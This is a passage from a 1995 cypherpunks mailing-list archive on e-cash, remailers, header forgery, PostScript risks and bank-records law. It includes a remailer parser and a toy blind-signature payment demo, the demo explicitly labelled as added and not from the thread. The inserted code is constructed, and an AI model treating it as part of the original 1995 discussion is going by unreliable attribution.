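        if m["point"]:
            address += f".{m['point']}"
        return {"kind": "fidonet", "name": m["name"].strip(), "address": address}
    if INET_RE.match(dest):
        return {"kind": "internet", "address": dest}
    if dest.upper() in KNOWN_ECHOES:
        return {"kind": "echo", "name": dest.upper()}
    raise RemailFormatError(f"unrecognised destination: {dest!r}")


def parse_remail_request(text):
    """Parse a message body: '::', command line, blank line, then the text."""
    lines = text.replace("\r\n", "\n").split("\n")
    if len(lines) < 2 or lines[0].strip() != "::":
        raise RemailFormatError("first line must be a double colon")
    command = lines[1].strip()
    if command.lower() == "help":
        return {"action": "help"}
    key, sep, value = command.partition(":")
    if not sep or key.strip().lower() != "remail-to" or not value.strip():
        raise RemailFormatError("second line must be 'remail-to: <destination>'")
    if len(lines) < 3 or lines[2].strip() != "":
        raise RemailFormatError("third line must be blank")
    body = "\n".join(lines[3:])
    if not body.strip():
        raise RemailFormatError("no text to remail after line 3")
    return {
        "action": "remail",
        "dest": parse_destination(value.strip()),
        "body": body,
    }


if __name__ == "__main__":
    # Constructed sample requests, including malformed ones.
    samples = [
        "::\nremail-to: Joe Sixpack @ 1:102/903.\n\nHello Joe",
        "::\nremail-to: tcmay@got.net\n\nHello Tim",
        "::\nremail-to: SYSOP\n\nPost to the echo",
        "::\nhelp",
        "remail-to: tcmay@got.net\n\nmissing double colon",
        "::\nremail-to: tcmay@got.net\nno blank line here",
    ]
    for s in samples:
        try:
            print(parse_remail_request(s))
        except RemailFormatError as err:
            print("rejected:", err)
```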




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Mon, 23 Oct 95 21:51:06 PDT
To: iang@cs.berkeley.edu
Subject: Re: Hacking Digicash (was: Article on Digital Cash in "Worth")
In-Reply-To: <46haei$i6o@calum.csclub.uwaterloo.ca>
Message-ID: <199510240445.VAA12282@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


> 
> We should be keeping in mind that the goal here is to end up, in one way
> or another, with a _secure_ way of transacting on the net.  To that end,
> it may be necessary to demonstrate that some current products don't
> provide that way.  We certainly don't want people to be scared away
> from using one insecure product, only to use another, especially
> if the latter is less secure than the former.


	This is the goal, but one must make sure that one's work does
not work -against- one's goal. My original draft for the hack digicash
web page was rather inflammatory "hasn't netscape taught us anything?"
but upon consultation I decided to change it to be less inflammatory
and mention that digicash, in principle, is the best electronic
payment system on the net, and that we need to make sure it is the
best payment system -in practice-.

-- 
sameer						Voice:   510-601-9777
Community ConneXion				FAX:	 510-601-9734
The Internet Privacy Provider			Dialin:  510-658-6376
http://www.c2.org (or login as "guest")			sameer@c2.org




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: patrick@Verity.COM (Patrick Horgan)
Date: Mon, 23 Oct 95 22:16:02 PDT
To: jirib@cs.monash.edu.au
Subject: Re: [reformatted] how secure can privasoft be?
Message-ID: <9510240512.AA07092@cantina.verity.com>
MIME-Version: 1.0
Content-Type: text/plain


> > This seems paradoxical. PrivaSoft uses a key approximately 30 bits long. It
> ...
> > Two possible explanations I can imagine are:
> > 
> > (0) PrivaSoft actually uses a key longer than 9 digits, and someone just made
> ...
> 
> Could it be 9 hex digits = 36 bits?

A nine digit number, 999,999,999 can be stored as 0x3b9ac9ff. Note that this is
eight 4bit hex digits, or 32 bits, except the top nibble only has two bits
used, or it's 30 bits.

> > The information contents a clear message
> 
> This is a strange title (I suspect "of" dropped out), but it might
> well sum it all up :-)

Nah, I suggested they reformat into 80 columns and suggested a different title
for this section, but they went with it.  They wanted it fer sure.  I just don't
know what it means.

> > a significant 
> > portion of the page must be reconstructed, and a significant amount of 
> > mathematical correlation must be calculated between neighboring areas of the 
> > image, before the cracking software can tell whether the candidate key is 
> ...
> 
> This can at most buy you a constant factor - useful, but not very.
> I doubt the two uses of "significant", too. Anybody remember those
> diagrams in Typing textbooks about the layout of a letter?

Someone else on this list mentioned that an edge detection algorithm would help 
here.  You wouldn't have to try to detect letters if there were no edges.
It could give you a quick go/no go.

> > The cryptographic engine can be customer-furnished and customer integrated, 
> 
> What do they mean by this bit?
> 

They mean that if you don't feel secure with theirs, you could use yours in
their framework...it's the pluggable encryption that NSA has had such a hard
time with but seems to be in favor of now.

Patrick
   _______________________________________________________________________
  /  These opinions are mine, and not Verity's (except by coincidence;).  \
 |                                                       (\                |
 |  Patrick J. Horgan         Verity Inc.                 \\    Have       |
 |  patrick@verity.com        1550 Plymouth Street         \\  _ Sword     | 
 |  Phone : (415)960-7600     Mountain View                 \\/    Will    | 
 |  FAX   : (415)960-7750     California 94303             _/\\     Travel | 
  \___________________________________________________________\)__________/




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Mon, 23 Oct 95 19:14:52 PDT
To: tien@well.sf.ca.us (Lee Tien)
Subject: Re: Anonymity: A Modest Proposal
In-Reply-To: <199510240148.SAA26014@well.com>
Message-ID: <199510240214.WAA05020@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Lee Tien writes:
> How difficult is it to forge headers?

Trivial. If you want to make even the Received: headers look right, it
takes a bit more work, but it's possible.

> How difficult is it to trace a message to the actual sender if the
> header is forged?

If they know what they are doing, it's very hard.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rah@shipwright.com (Robert Hettinga)
Date: Mon, 23 Oct 95 19:41:44 PDT
To: cypherpunks@toad.com
Subject: (fwd) WebNet-96 CFP (San Francisco)
Message-ID: <v02120d00acb2028bbb31@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain



--- begin forwarded text

From: "assoc. advancement computers ed." <aace@poe.acc.virginia.edu>
Subject: WebNet-96 CFP (San Francisco)
To: AACE <aace@virginia.edu>
Date: Mon, 23 Oct 95 21:00:21 EDT

  ----------------------------------------------------------------

  The complete WebNet-96 Call for Papers may be obtained by returning
  the information request form below or online from the AACE home page:

          http://aace.virginia.edu/aace/conf/calendar.html

   +*************************************************************+
   *                                                             *
   *                     W e b  N e t - 9 6                      *
   *                                                             *
   *            WORLD CONFERENCE OF THE WEB SOCIETY              *
   *                                                             *
   *                                                             *
   *         October 16-19, 1996 * San Francisco, CA USA         *
   *                                                             *
   *                                                             *
   *                 FIRST CALL FOR PARTICIPATION                *
   *                                                             *
   *              Submission Deadline: March 1, 1996             *
   *                                                             *
   *          Papers * Short Papers * Panels * Tutorials         *
   *             Workshops * Demonstrations * Posters            *
   *                                                             *
   *                       Sponsored by                          *
   *                 The Web Society and AACE--                  *
   *  Association for the Advancement of Computing in Education  *
   +*************************************************************+

                              ----------
                              INVITATION
                              ----------

WebNet-96 -- the first World Conference of the Web Society is an
international conference, organized by the Association for the
Advancement of Computing in Education (AACE). This annual conference
serves as a multi-disciplinary forum for the dissemination of information
on the research, development, and applications on all topics related to
the use, applications and societal and legal aspects of the Web in
its broadest sense, i.e. encompassing all modern tools to peruse the
Internet.

This conference is a must for all who plan to use the Internet for
informational, communicational or transactional applications
or, who are currently running or planning to run servers on the Internet.

We invite you to attend the WebNet-96 conference and submit proposals for
papers, panels, tutorials, workshops, and demonstrations/posters. All
proposals are reviewed for inclusion in the conference program.

Major Topics
------------
  Novel Applications of the Web
  Collaboration Using the Web
  The Web as Teaching Tool
  Electronic Publishing and the Web
  The Web as Marketing Tool
  Offering Services on the Web
  New Server Technologies for the Web
  New Navigational Tools for the Web
  Integration of Web Applications and Services
  Country Specific Developments
  The Web and Distance Education
  Net-based Multimedia/Hypermedia Systems
  Computer-Human Interface (CHI) Issues
  New Graphic Interfaces for the Web
  The Web and 3D
  Virtual Reality on the Web
  Intelligent Agents on the Web
  Directory Services on the Web
  Network Software for Large Data Bases
  Security and Privacy on the Web
  Charging Mechanisms for the Web
  Legal and Societal Aspects of the Web
  Courseware development for the Web
  Building Knowledge Bases on the Web
  Care and Feeding of Web Servers
  Educational Multimedia on the Web
  Browsers, Searchers and Other Tools
  Feedback Mechanisms on the Web

Conference Background
---------------------
WebNet is the annual conference of the Web Society that was founded in 1995
out of a concern that an organisation addressing the application aspects of
the Web and representing a lobby for Web users independent of specific
platforms and without the domination of commercial organisations was needed.
The WebSociety complements existing other bodies such as the Internet
Society and W3C. The former is, by definition, more concerned with
providing global Internet services than anything else and the latter is
specifically oriented towards one particular system WWW. The Web Society
and hence WebNet takes a more general view, dealing with a variety of
modern Internet tools and their integration including services such as
Gopher, WWW, Hyper-G, WAIS, directory services, FTP, email and cooperative
applications and novel approaches from Hot Java to VRML, from Web compatible
teaching modules to 3D interfaces.

For more details on the Web Society, see  http://info.WebSoc.org

              O /                                 O /
-------------- x  ----------  Cut Here  ---------- x -------------------
              o \                                 o \
                         -------------------
                         INFORMATION REQUEST
                         -------------------

To receive future WebNet-96 announcements, please complete this form
and return to the address below.

  Name: _________________________________________________________

  Address: ______________________________________________________
  _______________________________________________________________

  City/State/Code: ______________________________________________

  Country: ______________________________________________________

  E-Mail: _______________________________________________________

Please send me:
 __  Call for Participation
 __  Registration material
 __  Proceedings ordering information
 __  Brochure on the Web Society
 __  Brochure on Association for the Adv. of Computing in Ed. (AACE)
 __  Other information (please specify) _____________________________

Return to: WebNet-96/AACE
           P.O. Box 2966
           Charlottesville, VA 22902 USA
           E-mail: AACE@virginia.edu; 804-973-3987; Fax: 804-978-7449
           http://aace.virginia.edu/aace
=====================================================================

--- end forwarded text


-----------------
Robert Hettinga (rah@shipwright.com)
Shipwright Development Corporation, 44 Farquhar Street, Boston, MA 02131
USA (617) 323-7923
"Reality is not optional." --Thomas Sowell
>>>>Phree Phil: Email: zldf@clark.net  http://www.netresponse.com/zldf <<<<<






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mark <mark@lochard.com.au>
Date: Mon, 23 Oct 95 07:14:48 PDT
To: remailer-operators@c2.org
Subject: Re: require for new remailer list tag?
In-Reply-To: <199510230707.DAA22204@opine.cs.umass.edu>
Message-ID: <199510231159.AA11017@junkers.lochard.com.au>
MIME-Version: 1.0
Content-Type: text


>I'm curious about the potential sociological effects of such a move. I
>imagine that pseudonyms would be attracted to "permanent" remailers for
>use in their reply chains. But this phenomenon could/should be mitigated by
>the possibility that sting remailers would tend to advertise themselves as
>"permanent" (truthfully, even !), in anticipation of the bias in pseudonym
>remailer chain inclusion.

Personally I would be attracted to a fly-by-night remailer that was only up
for a short period of time. This is based on the [reasonable] assumption that
when the remailer is taken down, then any existing logfiles are also toasted.

A 30 minute remailer could exist by advertising in a known pool of billboards,
advertising its service, free or for cyberbucks for the next 30 minutes
only. People wishing to send anon email would scan the current remailers,
do a nym check for a superficial check of reliable message delivery, then
negotiate with the mailer to ensure it is still accepting, and then deliver
the message. Less than 30 minutes later the remailer is gone and your message
is queued up or sent as per the contract.

Any LEA/monitor/Co$ would have a hard time trying to subpoena records from
a program that removed all traces of itself within minutes of it running.
If the mail isn't delivered you can choose to bad bad on the nym to the
relevant nym rating services. If it is you can allocate kudos to the nym's
good name.

You could use the "2 cyberbucks for 30 minutes" remailer as your front end
into the pool or the final delivery point or whatever your preference.

People could start off their day in the morning by clicking to download a
remailer (suitably signed) to their machine for a bit of cash earnings during
the time they will be away in a meeting. Heck java could do this =). No need
to worry about lunch money, get your machine to earn it.

You get the idea. Old and reliable isn't always what you want... too easy to
watch.

Cheers,
Mark
mark@lochard.com.au
The above opinions are rumoured to be mine.



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: an224850@anon.penet.fi (scythe)
Date: Mon, 23 Oct 95 16:18:39 PDT
To: cypherpunks@toad.com
Subject: bank wiretapping law
Message-ID: <9510232303.AA06350@anon.penet.fi>
MIME-Version: 1.0
Content-Type: text/plain



a law that allows government interception of banking data
for intelligence/counterespionage purposes without notification...



Date: Sun, 22 Oct 1995 03:11:05 -0400 (EDT)
From: The Gate <gate@id.WING.NET>
Subject: Foreign Intelligence To Become Alien Intelligence
To: snet-l@world.std.com



The following post makes me think. What if the government could decide to
interpret the meaning of the word foreign however they wanted. They could 
then say that anyone dealing with extra-terrestrials were foreigners, or 
that anyone not aligned with their thinking was a foreigner. I think 
that's the direction they're taking.

			Lee

On Sat, 21 Oct 1995, Brad Dolan wrote:

> 
> 
> ---------- Forwarded message ----------
> Date: Fri, 20 Oct 1995 18:07:35 -0700
> Subject: Lack of secrecy in U.S. Banks
> 
> 
> I ran across an interesting fragment of the U.S. Code.
> 
> Apparently, the Federal Government may access any banking records
> whatsoever if the Director of the FBI (or the Director's designee)
> certify that the information is sought for "foreign intelligence
> purposes."  Further, it is illegal for anybody to disclose that the
> records were turned over to the government, or even sought.  I do not
> know the penalties for disclosure.
> 
> The Attorney General appears to set guidelines for the dissemination
> of the information obtained through this law.  Note that if banking
> privacy is violated for reasons which are not related to
> counter-intelligence operations, the victim is unlikely to be in a
> position to seek relief from the courts because the privacy violation
> is likely to remain secret.
> 
> I've enclosed the law below.  I'm not a lawyer, so it raises more
> questions than it answers.  Perhaps the more skilled readers on the
> list will be able to deduce the implications.
> 
> The U.S. Code is available at http://www.pls.com:8001/his/usc.html
> 
> This particular law is available at the improbable URL:
> http://www.pls.com:8001/cgi-bin/taos_doc.pl?unix+0+uscode+17566+query+a+Government+authority+authorized+to+conduct+foreign+counter+%25BREAK%25+uscode%3a
> 
> Here is the law itself:
> 
> -CITE-
> 
>    12 USC Sec. 3414                                             01/24/94
> 
> -EXPCITE-
> 
>    TITLE 12 - BANKS AND BANKING
>    CHAPTER 35 - RIGHT TO FINANCIAL PRIVACY
> 
> -HEAD-
> 
>    Sec. 3414. Special procedures
> 
> -STATUTE-
> 
>      (a)(1) Nothing in this chapter (except sections 3415, 3417, 3418,
>    and 3421 of this title) shall apply to the production and
>    disclosure of financial records pursuant to requests from -
>        (A) a Government authority authorized to conduct foreign
>      counter- or foreign positive-intelligence activities for purposes
>      of conducting such activities; or
>        (B) the Secret Service for the purpose of conducting its
>      protective functions (18 U.S.C. 3056; 3 U.S.C. 202, Public Law
>      90-331, as amended).
>      (2) In the instances specified in paragraph (1), the Government
>    authority shall submit to the financial institution the certificate
>    required in section 3403(b) of this title signed by a supervisory
>    official of a rank designated by the head of the Government
>    authority.
>      (3) No financial institution, or officer, employee, or agent of
>    such institution, shall disclose to any person that a Government
>    authority described in paragraph (1) has sought or obtained access
>    to a customer's financial records.
>      (4) The Government authority specified in paragraph (1) shall
>    compile an annual tabulation of the occasions in which this section
>    was used.
>      (5)(A) Financial institutions, and officers, employees, and
>    agents thereof, shall comply with a request for a customer's or
>    entity's financial records made pursuant to this subsection by the
>    Federal Bureau of Investigation when the Director of the Federal
>    Bureau of Investigation (or the Director's designee) certifies in
>    writing to the financial institution that such records are sought
>    for foreign counterintelligence purposes and that there are
>    specific and articulable facts giving reason to believe that the
>    customer or entity whose records are sought is a foreign power or
>    an agent of a foreign power as defined in section 1801 of title 50.
>      (B) The Federal Bureau of Investigation may disseminate
>    information obtained pursuant to this paragraph only as provided in
>    guidelines approved by the Attorney General for foreign
>    intelligence collection and foreign counterintelligence
>    investigations conducted by the Federal Bureau of Investigation,
>    and, with respect to dissemination to an agency of the United
>    States, only if such information is clearly relevant to the
>    authorized responsibilities of such agency.
>      (C) On a semiannual basis the Attorney General shall fully inform
>    the Permanent Select Committee on Intelligence of the House of
>    Representatives and the Select Committee on Intelligence of the
>    Senate concerning all requests made pursuant to this paragraph.
>      (D) No financial institution, or officer, employee, or agent of
>    such institution, shall disclose to any person that the Federal
>    Bureau of Investigation has sought or obtained access to a
>    customer's or entity's financial records under this paragraph.
>      (b)(1) Nothing in this chapter shall prohibit a Government
>    authority from obtaining financial records from a financial
>    institution if the Government authority determines that delay in
>    obtaining access to such records would create imminent danger of -
>        (A) physical injury to any person;
>        (B) serious property damage; or
>        (C) flight to avoid prosecution.
>      (2) In the instances specified in paragraph (1), the Government
>    shall submit to the financial institution the certificate required
>    in section 3403(b) of this title signed by a supervisory official
>    of a rank designated by the head of the Government authority.
>      (3) Within five days of obtaining access to financial records
>    under this subsection, the Government authority shall file with the
>    appropriate court a signed, sworn statement of a supervisory
>    official of a rank designated by the head of the Government
>    authority setting forth the grounds for the emergency access.  The
>    Government authority shall thereafter comply with the notice
>    provisions of section 3409(c) of this title.
>      (4) The Government authority specified in paragraph (1) shall
>    compile an annual tabulation of the occasions in which this section
>    was used.
> 
> -SOURCE-
> 
>    (Pub. L. 95-630, title XI, Sec. 1114, Nov. 10, 1978, 92 Stat. 3707;
>    Pub. L. 97-320, title IV, Sec. 432(b), Oct. 15, 1982, 96 Stat.
>    1527; Pub. L. 99-569, title IV, Sec. 404, Oct. 27, 1986, 100 Stat.
>    3197.)
> 
> -REFTEXT-
> 
>                             REFERENCES IN TEXT
>      Public Law 90-331, as amended, referred to in subsec. (a)(1)(B),
>    is Pub. L. 90-331, June 6, 1968, 82 Stat. 170, as amended, which is
>    set out as a note under section 3056 of Title 18, Crimes and
>    Criminal Procedure.
> 
> -MISC2-
> 
>                                 AMENDMENTS
>      1986 - Subsec. (a)(5). Pub. L. 99-569 added par. (5).
>      1982 - Subsec. (b)(2). Pub. L. 97-320 struck out ''of'' after
>    ''financial institution''.
> 
> -SECREF-
> 
>                   SECTION REFERRED TO IN OTHER SECTIONS
>      This section is referred to in sections 3402, 3409, 3421 of this
>    title.
>   __________________________________________________________________________
> 
> 



--****ATTENTION****--****ATTENTION****--****ATTENTION****--***ATTENTION***
Your e-mail reply to this message WILL be *automatically* ANONYMIZED.
Please, report inappropriate use to                abuse@anon.penet.fi
For information (incl. non-anon reply) write to    help@anon.penet.fi
If you have any problems, address them to          admin@anon.penet.fi




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anon-remailer@utopia.hacktic.nl (Anonymous)
Date: Mon, 23 Oct 95 15:24:02 PDT
To: cypherpunks@toad.com
Subject: Re: Encrypted TCP Tunneler
In-Reply-To: <Pine.SUN.3.91.951021145844.29391F-100000@eskimo.com>
Message-ID: <199510232223.XAA19030@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain


Tatu Ylonen (ylo@cs.hut.fi) wrote:
> You are aware that RSADSI claims they have exclusive licensing rights
> for DSA?

You are aware that Bidzos is full of shit?

Roger Schafly (sp?) addresses this issue in his lawsuit.  Hopefully this 
will be resolved soon.  The only problem is that Bidzos has made this claim
on patents in other countries, not just USA, so he'd probably have to be 
sued throughout Europe also...  He sure does do a good job of making 
himself a pain in the ass even when he knows he's wrong.

Anyway, you could use ElGamal signatures instead, it is not patented.
The D-H and H-M patents do not cover digital signatures.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: verify@cnet.com
Date: Mon, 23 Oct 95 23:31:44 PDT
Subject: Verification of Registration
Message-ID: <199510240631.XAA26526@zippity.cnet.com>
MIME-Version: 1.0
Content-Type: text/plain


Your membership registration has been processed.  To become a full member
of c|net online, please return the text of this message (to verify@cnet.com).

The following magic token in this message [cypherpunks::752400770] will be automatically
processed to verify you.  Please note: The number included in the token is
*not* your password; the one to use on the site is the one you entered on
the registration form.

Please include the complete token appearing above, including the brackets.
The best way to return it to us is to include this entire message in your
reply.  If your mailer does not allow you to do this, retype or cut and
paste the magic token (including the square brackets) into a new message to
verify@cnet.com. If you are having difficulty completing this process,
please direct your questions to support@cnet.com.

Once you are verified you will be able to take advantage of the full
range of c|net online's services.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous-remailer@shell.portal.com
Date: Tue, 24 Oct 95 00:35:59 PDT
To: cypherpunks@toad.com
Subject: Re: Netscape Logic Bomb detailed by IETF
Message-ID: <199510240734.AAA23451@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


Perry E. Metzger writes:
>anonymous-remailer@shell.portal.com writes:
>> Clearly, someone has a vested interest which they are expending a 
>> great deal of effort to protect.  My email to Netscape detailing their 
>> logic bomb has gone unanswered, and unacknowledged for ten days now.
>
>Maybe because you're an idiot and they don't feel that it's necessary
>to answer. What more need be said?

I see that Perry is as charming as ever?

Perry, I just don't think that it is wise to stick your head in the sand
and ignore a severe flaw in your algorithm, while actively misrepresenting
matters to those people who are not intimately familiar with the IETF. 

>Those of us who care run our postscript interpreters with all the
>dangerous commands stripped out, 

Perry, I'll call you on that one, cause you simply can't do it.  

Postscript isn't like any other language around.  Operator names have no
special significance to the interpreter.  You can't just "strip out" 
dangerous commands.  They aren't "reserved" in the sense that operator
names are in other languages, like COBOL or BASIC. 

In Postscript, operator names are simply keys into a LIFO dictionary. 
This makes Postscript different from other languages because you could
redefine these names if you wanted to.  Stripping something from a
dictionary doesn't matter because the search sequence is top down.

If I rewrite an operator name, and put it at the top of the stack, there's
not anything you can do.  

Gee's Perry, even if you haven't stripped something out, I can rewrite it. 
And the interpreter will find the rewritten version before the version
that's in your machine. 

And before someone attacks me for an inelegant "style" these potentially
confusing antics are routinely used under extraordinary circumstances.
There's no malice involved at all, simply real-world operation. 

And this is why the Request-For-Comments from the IETF warns:

   "Postscript is an extensible language, and many, if not most, 
    implementations of it provide their own extensions.  This document
    does not deal with such extensions explicitly since they constitute
    an unknown factor ..."

Is that clearer??  If you thought that you had "safety" cause you stripped
your interpreter, then you're in trouble, cause that doesn't work. 

> but given that Netscape doesn't supply postscript interpreters, it's not
> really their fault or problem.

Well, that line might work on those who don't know any better, but that's
also why the Internet Engineering Task Force (IETF) tries to protect the 
public by suggesting that implementors like Netscape not pass the ball:

    "The execution of general-purpose PostScript interpreters entails
     serious security risks, and implementors are discouraged from simply
     sending PostScript email bodies to "off-the-shelf" interpreters."

Netscape ignores this suggestion.  

I guess that Netscape simply knows more (or cares less??) than the entire
collected wisdom of the International contributors who make up the IETF. 

Gee, there's lotsa wisdom over there at Netscape.




Alice de 'nonymous ...

                                  ...just another one of those...


P.S.  This post is in the public domain.
                  C.  S.  U.  M.  O.  C.  L.  U.  N.  E.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tomw@orac.engr.sgi.com (Tom Weinstein)
Date: Tue, 24 Oct 95 00:46:33 PDT
To: cypherpunks@toad.com
Subject: Re: How can e-cash, even on-line cleared, protect payee identity?
In-Reply-To: <199510232023.OAA10038@nag.cs.colorado.edu>
Message-ID: <199510240746.AAA01967@orac.engr.sgi.com>
MIME-Version: 1.0
Content-Type: text/plain


In article <DGxFBL.753@sgi.sgi.com>, Hal <hfinney@shell.portal.com> writes:

> "Simon Spero" <ses@tipper.oit.unc.edu>  wrote:
>>> If so, there's 
>>> an obvious way to get two way anonymity with an on-line system. If Alice 
>>> wants to pay Bob $10, then Bob could prepare the usual squillion copies 
>>> of the note, each with a serial number known only to Bob, then blind them 
>>> and send them to Alice. 
>>> 
>>> Alice would then reblind them and send them to Nick, the banker. Nick
>>> would then pick one of the notes, and ask Alice for the blinders for the
>>> rest. Alice would then ask Bob for his blinders for the rejected notes,
>>> and would forward both sets on to Nick, who would check them, and if
>>> they're legit, sign the remaining copy, and return it to Alice.
>>> Alice could then remove her blinding factor, and send the result on to
>>> Bob. Bob then removes his blinding factor, and can now spend the coin. 

> This is an interesting idea but it is more complicated than necessary, I
> think.  The denomination can be carried in the exponent, in which case
> there is no need for cut and choose and nobody can cheat the bank.  A
> coin suitable for deposit is a signed number of some special form.  To
> pay Bob, Alice does not withdraw anything ahead of time.  Rather, Bob
> gives her a blinded coin, which she reblinds and gives to the bank.  The
> bank signs it (debiting Alice's account) and gives it back to her.  She
> strips off her blinding and gives it to Bob.  He strips off his own
> blinding and verifies that he is left with a signed number of the
> appropriate form.

> This system is in some ways the inverse of regular ecash.  Instead of
> Alice withdrawing a coin ahead of time, and Bob checking it with the bank
> right away, it is Alice who does the bank interaction at payment time,
> and Bob who waits before interacting with the bank.  The computational
> and communications costs do not seem much worse than ecash.

> There is no way Alice can double-spend because she cannot anticipate
> Bob's blinding factor and give him a previously-spent coin which will
> unblind to the proper form.  There could be an issue of fraud, though,
> where Bob insists that Alice's coin was no good even though it actually
> was.  Since he has blinded it she will have no way of recognizing it when
> he eventually deposits it.  In the current system this does not arise as
> Alice can always give him another copy of the coin and prove that it is
> good, and she can further determine if Bob has deposited it.  So some of
> the trust in the bank necessary with regular ecash gets replaced by trust
> between payee and payor in Simon Spero's system.

If Bob insists that the bank wouldn't redeem Alice's coin, that's not
Alice's fault.  The bank should have reserved the money when Alice
withdrew it.  Since nobody other than Bob sees the unblinded coin, it's
Bob's fault if somebody else spent it before Bob could.  In the case of
fraud by the bank, since the bank signed the coin, the bank should be
liable if it won't redeem it.

Perhaps the problem is that Bob insists that Alice's coin was not signed
by the bank.  In that case, how about this modification?  Alice should
first show Bob the doubly blinded coin she gave to the bank and the
signed doubly blinded coin she received back.  Bob can verify the
signature and then Alice can give him the blinding factor so he can
unblind it himself.  Bob also needs to sign the singly blinded coin that
he gives to Alice so that Alice can later show that she gave him the
correct blinding factor if Bob tries to claim that she didn't.

Are there any problems with this?

-- 
Sure we spend a lot of money, but that doesn't mean | Tom Weinstein
we *do* anything.  --  Washington DC motto          | tomw@engr.sgi.com
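
Added example, not code from the thread: the reblinding payment Hal describes, with Tom Weinstein's two additions (Bob checks the bank's signature on the doubly blinded coin before unblinding it himself, and signs the singly blinded coin as a receipt). It assumes textbook RSA with constructed toy keys and a SHA-256 digest standing in for the coin's "special form"; every function name is hypothetical.

```python
import hashlib
import secrets
from math import gcd

E = 65537  # public exponent shared by both toy keys


def make_key(p, q):
    """Textbook RSA: return (n, d) for primes p and q."""
    return p * q, pow(E, -1, (p - 1) * (q - 1))


# Constructed toy keys built from Mersenne primes; far too small for real use.
BANK_N, BANK_D = make_key(2**61 - 1, 2**89 - 1)
BOB_N, BOB_D = make_key(2**107 - 1, 2**127 - 1)


def digest(data, n):
    """Map bytes to a number below n (stands in for the coin's 'form')."""
    return int.from_bytes(hashlib.sha256(data).digest(), "big") % n


def blinder(n):
    """Random blinding factor that is invertible mod n."""
    while True:
        r = secrets.randbelow(n - 2) + 2
        if gcd(r, n) == 1:
            return r


def blind(x, r, n):
    return x * pow(r, E, n) % n


def unblind(sig, r, n):
    return sig * pow(r, -1, n) % n


def sign(x, d, n):
    return pow(x, d, n)


def verify(sig, x, n):
    return pow(sig, E, n) == x


def arbiter_accepts(c1, receipt, c2, s2, r_alice):
    """Evidence Alice can show later: Bob asked for c1, the bank signed c2,
    and r_alice is the factor that links the two."""
    return (verify(receipt, digest(str(c1).encode(), BOB_N), BOB_N)
            and blind(c1, r_alice, BANK_N) == c2
            and verify(s2, c2, BANK_N))


def pay(alice_reveals_wrong_factor=False):
    # Bob: secret serial, blinded coin c1, and a signed receipt for c1.
    serial = secrets.token_bytes(16)
    r_bob = blinder(BANK_N)
    c1 = blind(digest(serial, BANK_N), r_bob, BANK_N)
    receipt = sign(digest(str(c1).encode(), BOB_N), BOB_D, BOB_N)

    # Alice: reblind; the bank signs a value it cannot read and debits her.
    r_alice = blinder(BANK_N)
    c2 = blind(c1, r_alice, BANK_N)
    s2 = sign(c2, BANK_D, BANK_N)

    # Alice shows Bob c2 and s2, then reveals her blinding factor.
    revealed = r_alice + 1 if alice_reveals_wrong_factor else r_alice
    bob_accepts = (verify(s2, c2, BANK_N)
                   and blind(c1, revealed, BANK_N) == c2)

    # Bob strips both layers himself and checks the coin's form.
    coin_valid = False
    if bob_accepts:
        coin = unblind(unblind(s2, revealed, BANK_N), r_bob, BANK_N)
        coin_valid = verify(coin, digest(serial, BANK_N), BANK_N)
    return bob_accepts, coin_valid, arbiter_accepts(c1, receipt, c2, s2, revealed)
```

The bank only ever sees `c2`, and Alice never sees the serial or the finished coin, which is why the receipt on `c1` is the only thing tying her payment to Bob's request.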




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Aleph One <aleph1@dfw.net>
Date: Mon, 23 Oct 95 23:03:57 PDT
Subject: Re: Mark Twain Bank (was: Anonymity: A Modest Proposal) (fwd)
In-Reply-To: <199510240222.TAA03524@infinity.c2.org>
Message-ID: <Pine.SUN.3.90.951024005819.18976A-100000@dfw.net>
MIME-Version: 1.0
Content-Type: text/plain


Well just another bit of information. On their FAQ they say to mail to 
shops@marktwain.com for more information on merchant accounts. Well the 
address does not exist. Not a very good start. I hope they get their act
together.

Aleph One / aleph1@dfw.net
http://underground.org/
KeyID 1024/948FD6B5 
Fingerprint EE C9 E8 AA CB AF 09 61  8C 39 EA 47 A8 6A B8 01 






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Salz <rsalz@osf.org>
Date: Mon, 23 Oct 95 22:51:06 PDT
To: owner-cypherpunks@toad.com
Subject: Re: [reformatted] how secure can privasoft be?
Message-ID: <9510240546.AA25372@sulphur.osf.org>
MIME-Version: 1.0
Content-Type: text/plain


>their framework...it's the pluggable encryption that NSA has had such a hard
>time with but seems to be in favor of now.

What makes you say the NSA is in favor of pluggable crypto?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: steveha@cix.compulink.co.uk (Steve Harris)
Date: Mon, 23 Oct 95 18:59:34 PDT
To: cypherpunks@toad.com
Subject: Re: Anonymity: A Modest Proposal
Message-ID: <memo.878357@cix.compulink.co.uk>
MIME-Version: 1.0
Content-Type: text/plain


In-Reply-To: <199510232235.SAA26441@opine.cs.umass.edu>
I'm well advanced with a Windows Pre-Mailer for use with Nymservers. The 
project was inspired by a very serious emotional support group I'm in. 
It's LISTSERV based and doesn't mix well with anon.penet.fi. Nymservers 
would be excellent for such purposes if they were easy to use. Hence this 
project.

I certainly don't want to create a Spammer's tool. Right now, I have put in
space for managing up to 10 Nyms. I chose 10 because I thought it was more 
than anyone would want....



Steve





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alex de Joode <usura@replay.com>
